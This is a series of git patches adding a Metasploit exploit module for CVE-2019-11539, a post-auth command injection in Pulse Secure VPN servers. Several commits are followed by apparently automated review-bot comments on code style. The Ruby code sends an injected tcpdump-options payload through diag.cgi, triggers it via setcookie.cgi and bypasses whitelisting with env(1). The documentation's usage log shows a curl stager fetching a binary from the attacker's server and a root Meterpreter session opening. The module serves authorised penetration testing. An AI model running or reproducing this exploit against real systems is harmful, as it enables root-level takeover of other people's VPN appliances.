From 77c26e9a7071f8eacd66025a99ec70de07fce94d Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Oct 2019 20:08:02 -0500 Subject: [PATCH 01/19] Add Pulse Secure VPN arbitrary command execution --- .../linux/http/pulse_secure_cmd_exec.rb | 132 ++++++++++++++++++ 1 file changed, 132 insertions(+) create mode 100644 modules/exploits/linux/http/pulse_secure_cmd_exec.rb diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb new file mode 100644 index 0000000000..7d2381ec18 --- /dev/null +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb 
@@ -0,0 +1,132 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', + 'Description' => %q{ + This module exploits a post-auth command injection in the Pulse Secure + VPN server to execute arbitrary commands as root. + }, + 'Author' => [ + 'Orange Tsai', # Discovery (@orange_8361) + 'Meh Chang', # Discovery (@mehqq_) + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2019-11539'], + ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'], + ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'], + ['URL', 'https://hackerone.com/reports/591295'] + ], + 'DisclosureDate' => '2019-04-24', # Public disclosure + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Privileged' => true, + 'Targets' => [['Linux Dropper', {}]], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'RPORT' => 443, + 'SSL' => true, + 'CMDSTAGER::SSL' => true, + 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' + }, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] + } + )) + + register_options([ + OptString.new('SID', [true, 'Valid session ID']) + ]) + end + + def exploit + get_csrf_token + + execute_cmdstager( + flavor: :curl, + noconcat: true + ) + end + + def get_csrf_token + @cookie = "DSID=#{datastore['SID']}" + print_good("Setting session cookie: #{@cookie}") + + print_status('Obtaining CSRF token') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => diag_cgi, + 
'cookie' => @cookie + ) + + unless res && res.code == 200 && (@csrf_token = parse_csrf_token(res.body)) + fail_with(Failure::NoAccess, 'Session cookie expired') + end + + print_good("CSRF token: #{@csrf_token}") + end + + def parse_csrf_token(body) + body.to_s.scan(/xsauth=([[:xdigit:]]+)/).flatten.first + end + + def execute_command(cmd, _opts = {}) + # Prepend absolute path to curl(1), since it's not in $PATH + cmd.prepend('/home/bin/') if cmd.start_with?('curl') + + # Bypass application whitelisting with permitted env(1) + cmd.prepend('env ') + + vprint_status("Executing command: #{cmd}") + print_status("Yeeting exploit at #{full_uri(diag_cgi)}") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => diag_cgi, + 'cookie' => @cookie, + 'vars_get' => { + 'a' => 'td', # tcpdump + 'options' => sploit(cmd), + 'xsauth' => @csrf_token, + 'toggle' => 'Start Sniffing' + } + ) + + unless res && res.code == 200 + fail_with(Failure::UnexpectedReply, 'Could not yeet exploit') + end + + print_status("Triggering payload at #{full_uri(setcookie_cgi)}") + send_request_cgi( + 'method' => 'GET', + 'uri' => setcookie_cgi + ) + end + + def sploit(cmd) + %(-r$x="#{cmd}",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <) + end + + def diag_cgi + '/dana-admin/diag/diag.cgi' + end + + def setcookie_cgi + '/dana-na/auth/setcookie.cgi' + end + +end From f3a6aeea60ce8e342099ae4a9fc50ff8f13af9af Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Oct 2019 20:31:58 -0500 Subject: [PATCH 02/19] Add true post_auth? definition --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 7d2381ec18..b59effae62 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb 
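Review bot: `execute_command` rewrites its `cmd` argument in place with `String#prepend` (twice), so the caller's string is modified as a side effect; the stager's freshly generated strings tolerate this, but any caller that reuses the object sees the mutation, and a frozen string would raise `FrozenError`. Building a new string keeps the method free of that side effect: `cmd = "/home/bin/#{cmd}" if cmd.start_with?('curl')` followed by `cmd = "env #{cmd}"`. The same concern applies to the `:unix_memory` path added in PATCH 04, which passes `payload.encoded` straight in; if that value is ever memoized or frozen, the in-place edit corrupts it or raises. `execute_command` also has no header comment; a one-liner such as `# Injects cmd through diag.cgi, then requests setcookie.cgi to trigger it` would help the next reader.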
@@ -54,6 +54,10 @@ class MetasploitModule < Msf::Exploit::Remote ]) end + def post_auth? + true + end + def exploit get_csrf_token From 81da0d18c6da73dab7dd5868b4c4c843788b3e02 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Oct 2019 20:41:57 -0500 Subject: [PATCH 03/19] Add blurb about pre-auth file read --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index b59effae62..bea43a789e 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -16,6 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a post-auth command injection in the Pulse Secure VPN server to execute arbitrary commands as root. + + Please see related module auxiliary/gather/pulse_secure_file_disclosure + for a pre-auth file read that is able to obtain plaintext and hashed + credentials, plus session IDs that may be used with this exploit. }, 'Author' => [ 'Orange Tsai', # Discovery (@orange_8361) From 5b825e8245d238a34d83d9294ce96360ba1535be Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 00:31:01 -0600 Subject: [PATCH 04/19] Readd cmd/unix/generic target with manual badchars --- .../linux/http/pulse_secure_cmd_exec.rb | 72 ++++++++++++------- 1 file changed, 47 insertions(+), 25 deletions(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index bea43a789e..13c82f67a4 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb 
@@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', - 'Description' => %q{ + 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', + 'Description' => %q{ This module exploits a post-auth command injection in the Pulse Secure VPN server to execute arbitrary commands as root. 
@@ -21,35 +21,52 @@ class MetasploitModule < Msf::Exploit::Remote for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. }, - 'Author' => [ + 'Author' => [ 'Orange Tsai', # Discovery (@orange_8361) 'Meh Chang', # Discovery (@mehqq_) 'wvu' # Module ], - 'References' => [ + 'References' => [ ['CVE', '2019-11539'], ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'], ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'], ['URL', 'https://hackerone.com/reports/591295'] ], - 'DisclosureDate' => '2019-04-24', # Public disclosure - 'License' => MSF_LICENSE, - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Privileged' => true, - 'Targets' => [['Linux Dropper', {}]], - 'DefaultTarget' => 0, - 'DefaultOptions' => { - 'RPORT' => 443, - 'SSL' => true, - 'CMDSTAGER::SSL' => true, - 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' + 'DisclosureDate' => '2019-04-24', # Public disclosure + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Privileged' => true, + 'Targets' => [ + ['Unix In-Memory', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => { + 'BadChars' => %Q(&*(){}[]`;|?\n~<>"'), + 'Encoder' => 'generic/none' # Force manual badchar analysis + }, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'} + ], + ['Linux Dropper', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper, + 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'} + ] + ], + 'DefaultTarget' => 1, + 'DefaultOptions' => { + 'RPORT' => 443, + 'SSL' => true, + 'CMDSTAGER::SSL' => true, + 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' }, - 'Notes' => { - 'Stability' => [CRASH_SAFE], - 'Reliability' => [REPEATABLE_SESSION], - 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], - 'RelatedModules' 
=> ['auxiliary/gather/pulse_secure_file_disclosure'] + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] } )) @@ -65,10 +82,15 @@ class MetasploitModule < Msf::Exploit::Remote def exploit get_csrf_token - execute_cmdstager( - flavor: :curl, - noconcat: true - ) + case target['Type'] + when :unix_memory + execute_command(payload.encoded) + when :linux_dropper + execute_cmdstager( + flavor: :curl, + noconcat: true + ) + end end def get_csrf_token From 09901fdf5602bf007b8b88f1190d4dda764aff96 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:08:25 -0600 Subject: [PATCH 05/19] Clarify session cookie could be invalid --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 13c82f67a4..016e6e4cce 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote ) unless res && res.code == 200 && (@csrf_token = parse_csrf_token(res.body)) - fail_with(Failure::NoAccess, 'Session cookie expired') + fail_with(Failure::NoAccess, 'Session cookie expired or invalid') end print_good("CSRF token: #{@csrf_token}") From f4c76902474f91b765211ce874586368d3dac216 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:08:56 -0600 Subject: [PATCH 06/19] Print cmd/unix/generic command output, minus HTML --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 016e6e4cce..f1d8d604b1 100644 
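Review bot: The new `case target['Type']` in `exploit` has no `else`, so an unrecognised type returns silently after `get_csrf_token` with no request sent and no error reported. An explicit `else fail_with(Failure::BadConfig, "Unknown target type: #{target['Type']}")` makes the gap visible instead of looking like a quiet success. Targets are fixed by the module today, so this is purely defensive, but it costs two lines and protects future target additions.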
--- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -141,10 +141,19 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Triggering payload at #{full_uri(setcookie_cgi)}") - send_request_cgi( + res = send_request_cgi( 'method' => 'GET', 'uri' => setcookie_cgi ) + + # 200 response code, yet 500 error in body + if res.body.include?('500 Internal Error') + fail_with(Failure::PayloadFailed, 'Could not execute payload') + end + + if datastore['PAYLOAD'] == 'cmd/unix/generic' + print_line(res.body.sub(/\s*.*/m, '')) + end end def sploit(cmd) From e9fb4a2528caa86b2b06934752032683d93734eb Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:10:26 -0600 Subject: [PATCH 07/19] Check for nil Oops. --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index f1d8d604b1..57409a981b 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote ) # 200 response code, yet 500 error in body - if res.body.include?('500 Internal Error') + unless res && res.code == 200 && !res.body.include?('500 Internal Error') fail_with(Failure::PayloadFailed, 'Could not execute payload') end From 8664ac9dd81233a4a3bbf580c64e2d6d77295c00 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:17:28 -0600 Subject: [PATCH 08/19] Add target print --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 57409a981b..6774025ed4 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb 
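Review bot: As rendered, the filter `res.body.sub(/\s*.*/m, '')` in the new `cmd/unix/generic` branch of `execute_command` matches the entire body (`.` spans newlines under `/m` in Ruby), so `print_line` would print an empty string rather than the output minus HTML. Given the commit title, the pattern was presumably meant to cut from the first tag, e.g. `res.body.sub(/\s*<.*/m, '')`, and the `<` may have been lost in page rendering; worth confirming against the file. A comment such as `# Command output precedes the HTML; drop everything from the first tag` would document that assumption. Separately, this branch keys on `datastore['PAYLOAD']` by name while `exploit` dispatches on `target['Type']`; checking `target['Type'] == :unix_memory` would keep the two consistent.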
+++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -82,6 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote def exploit get_csrf_token + print_status("Executing #{target.name} target") + case target['Type'] when :unix_memory execute_command(payload.encoded) From 2c6c46701c3d91f77aee4b37199a8d6038d9ffda Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:23:53 -0600 Subject: [PATCH 09/19] Update DefaultOptions --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 6774025ed4..bc4414eea0 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -53,14 +53,14 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'} + } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, - 'CMDSTAGER::SSL' => true, - 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' + 'CMDSTAGER::SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], From bc5b0645dd176f12f9370507ddde1868675bf1a2 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:25:36 -0600 Subject: [PATCH 10/19] Fix typo --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index bc4414eea0..f45daaabca 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb 
@@ -53,7 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'} - } ] ], 'DefaultTarget' => 1, From 1573664c781a49797bc619c3d53f857b74e125d8 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:41:19 -0600 Subject: [PATCH 11/19] Reduce timeout for when the shell pops --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index f45daaabca..7c95176491 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -142,10 +142,10 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Triggering payload at #{full_uri(setcookie_cgi)}") - res = send_request_cgi( + res = send_request_cgi({ 'method' => 'GET', 'uri' => setcookie_cgi - ) + }, 3.5) # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') From d8e612726cb16530f4a7ec087e0ca8cf0ac6f6c7 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:46:23 -0600 Subject: [PATCH 12/19] Note that an admin SID is required at present --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 7c95176491..6feae37942 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb 
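Review bot: The `3.5` passed as the second argument to `send_request_cgi` in `execute_command` is an unexplained magic number, changed again to `3.1337` in PATCH 15 without a comment in either place. The commit titles suggest the reason (a working payload blocks the CGI, so this request is expected to time out), but the code does not say so; a named constant such as `TRIGGER_TIMEOUT = 3.5 # short: a working payload blocks setcookie.cgi, so this normally times out` (or the same comment on the call) would preserve that reasoning. If the value needs tuning per environment, an `OptFloat` advanced option is the Metasploit-idiomatic place for it.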
@@ -20,6 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. + + A valid administrator session ID is required in lieu of untested SSRF. }, 'Author' => [ 'Orange Tsai', # Discovery (@orange_8361) @@ -70,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote )) register_options([ - OptString.new('SID', [true, 'Valid session ID']) + OptString.new('SID', [true, 'Valid admin session ID']) ]) end From 238c931fd3bdaee7a115fd44779de25e40463d6e Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:55:56 -0600 Subject: [PATCH 13/19] Don't fail module if blocking through timeout --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 6feae37942..459c9f50fc 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -151,7 +151,8 @@ class MetasploitModule < Msf::Exploit::Remote # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') - fail_with(Failure::PayloadFailed, 'Could not execute payload') + print_error('Payload execution may have failed') + return end if datastore['PAYLOAD'] == 'cmd/unix/generic' From de72ed85457c44083434846335113525946bb187 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:02:53 -0600 Subject: [PATCH 14/19] Print our glorious success --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 459c9f50fc..3e9a1da6e5 100644 
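Review bot: After this change the `# 200 response code, yet 500 error in body` comment above the `unless` in `execute_command` is stale: since PATCH 11 the guard also fires when `res` is `nil` because the short request timed out, which this commit's title treats as the expected outcome when the payload blocks. The comment should cover both cases, e.g. `# nil: request timed out (expected when the payload blocks); 200 with '500 Internal Error' in body: execution failed`. Downgrading to a warning instead of `fail_with` is consistent with that reasoning, and the comment is where the reasoning belongs.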
--- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -155,6 +155,8 @@ class MetasploitModule < Msf::Exploit::Remote return end + print_good('Payload execution successful') + if datastore['PAYLOAD'] == 'cmd/unix/generic' print_line(res.body.sub(/\s*.*/m, '')) end From 0c4580f2546bfe37f3cb5fce6122ce207a14e01f Mon Sep 17 00:00:00 2001 From: wvu-r7 Date: Tue, 12 Nov 2019 02:03:52 -0600 Subject: [PATCH 15/19] Calibrate timeout for hax Co-Authored-By: bcoles --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 3e9a1da6e5..86663bff3c 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'GET', 'uri' => setcookie_cgi - }, 3.5) + }, 3.1337) # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') From 8df559eceb9172e788dddc54e8292c4d3d9f322b Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:09:10 -0600 Subject: [PATCH 16/19] Update print to warning --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 86663bff3c..43c6f420c0 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb 
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') - print_error('Payload execution may have failed') + print_warning('Payload execution may have failed') return end From a17b2c20413ecb5257c3fd6b89b790dc6976bf9a Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:10:10 -0600 Subject: [PATCH 17/19] Add module doc --- .../linux/http/pulse_secure_cmd_exec.md | 77 +++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md new file mode 100644 index 0000000000..f1d71bb6e7 --- /dev/null +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md 
@@ -0,0 +1,77 @@ +## Introduction + +This module exploits a post-auth command injection in the Pulse Secure +VPN server to execute arbitrary commands as root. + +Please see related module `auxiliary/gather/pulse_secure_file_disclosure` +for a pre-auth file read that is able to obtain plaintext and hashed +credentials, plus session IDs that may be used with this exploit. + +A valid administrator session ID is required in lieu of untested SSRF. + +## Targets + +``` +Id Name +-- ---- +0 Unix In-Memory +1 Linux Dropper +``` + +## Options + +**SID** + +Set this to a valid administrator session ID. Typically retrieved using +the `auxiliary/gather/pulse_secure_file_disclosure` module. + +## Usage + +``` +msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857 +sid => 676f5f892e8c4a6419f10564f9e9d857 +msf5 exploit(linux/http/pulse_secure_cmd_exec) > run + +[*] Started reverse TCP handler on 127.0.0.1:[redacted] +[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857 +[*] Obtaining CSRF token +[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5 +[*] Executing Linux Dropper target +[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77 +[*] Local IP: https://[redacted]:[redacted]/HSEjp77 +[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"] +[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77 +[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi +[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi +[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77 +[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) +[+] Payload execution successful +[*] Command Stager progress - 63.96% done (71/111 bytes) +[*] 
Executing command: env chmod +x /tmp/qlUqDxCU +[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi +[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi +[+] Payload execution successful +[*] Command Stager progress - 87.39% done (97/111 bytes) +[*] Executing command: env /tmp/qlUqDxCU +[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi +[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi +[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600 +[!] Payload execution may have failed +[*] Command Stager progress - 102.70% done (114/111 bytes) +[*] Executing command: env rm -f /tmp/qlUqDxCU +[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi +[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi +[+] Payload execution successful +[*] Command Stager progress - 123.42% done (137/111 bytes) +[*] Server stopped. + +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +meterpreter > sysinfo +Computer : [redacted] +OS : (Linux 2.6.32-00486-gddd7e32-dirty) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` From a267ad9d64b7479116f6a850d65e6e046e5f3a1d Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:17:58 -0600 Subject: [PATCH 18/19] Reference env(1) as the reason we have useful RCE --- .../modules/exploit/linux/http/pulse_secure_cmd_exec.md | 3 ++- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 3 ++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md index f1d71bb6e7..7630c2a2ad 100644 --- a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md 
@@ -1,7 +1,8 @@ ## Introduction This module exploits a post-auth command injection in the Pulse Secure -VPN server to execute arbitrary commands as root. +VPN server to execute commands as root. The env(1) command is used to +bypass application whitelisting and run arbitrary commands. Please see related module `auxiliary/gather/pulse_secure_file_disclosure` for a pre-auth file read that is able to obtain plaintext and hashed diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 43c6f420c0..dbfd70c482 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -15,7 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', 'Description' => %q{ This module exploits a post-auth command injection in the Pulse Secure - VPN server to execute arbitrary commands as root. + VPN server to execute commands as root. The env(1) command is used to + bypass application whitelisting and run arbitrary commands. Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed From a8e289ee9ccd2d09f1bc327ea366b51f27255608 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:46:18 -0600 Subject: [PATCH 19/19] Code-block env(1) --- .../modules/exploit/linux/http/pulse_secure_cmd_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md index 7630c2a2ad..a8a7d668f0 100644 --- a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md 
